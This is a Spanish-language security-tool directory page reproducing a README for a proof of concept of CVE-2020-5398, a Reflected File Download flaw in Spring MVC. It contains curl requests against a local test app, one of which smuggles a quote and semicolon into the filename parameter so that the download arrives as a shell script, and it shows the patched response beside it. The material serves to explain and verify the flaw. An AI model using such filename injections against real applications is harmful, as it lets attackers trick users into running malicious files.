Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-5398 — CVE-2020-5398 - Ataque RFD(Reflected File Download) para Spring MVC | Kitploit
Herramientas/GitHubGitHub/motikan2010/cve-2020-5398
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubmotikan2010/cve-2020-5398

CVE-2020-5398

CVE-2020-5398 - Ataque RFD(Reflected File Download) para Spring MVC

Ver Repositorio
84184hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-5398 - Ataque RFD (Reflected File Download) para Spring MVC

En Spring Framework, las versiones 5.2.x anteriores a 5.2.3, las versiones 5.1.x anteriores a 5.1.13 y las versiones 5.0.x anteriores a 5.0.16, una aplicación es vulnerable a un ataque de descarga de archivos reflejada (RFD) cuando establece un encabezado “Content-Disposition” en la respuesta donde el atributo filename se deriva de la entrada proporcionada por el usuario.

Uso

./gradlew bootrun

Escucha en 127.0.0.1:8080.

$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT

Hello, World

Inicia la descarga del archivo sample.txt.

PoC

Versión insegura (Spring Web 5.2.2)

curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT

#!/bin/bash
id

Inicia la descarga del archivo sample.sh. (Archivo shell)

Versión segura (Spring Web 5.2.3)

$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT

#!/bin/bash
id

Inicia la descarga del archivo sample.sh\";.txt. (Archivo de texto)

Referencias

  • CVE-2020-5398: Ataque RFD mediante el encabezado “Content-Disposition” obtenido de la entrada de la solicitud por aplicaciones Spring MVC o Spring WebFlux | Seguridad | Pivotal
  • NVD - CVE-2020-5398
  • ¿Qué es un ataque RFD?
    • eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
    • Reflected File Download - OWASP
  • Commit de corrección
    • ContentDisposition refactoring · spring-projects/spring-framework@956ffe6
Descargar herramienta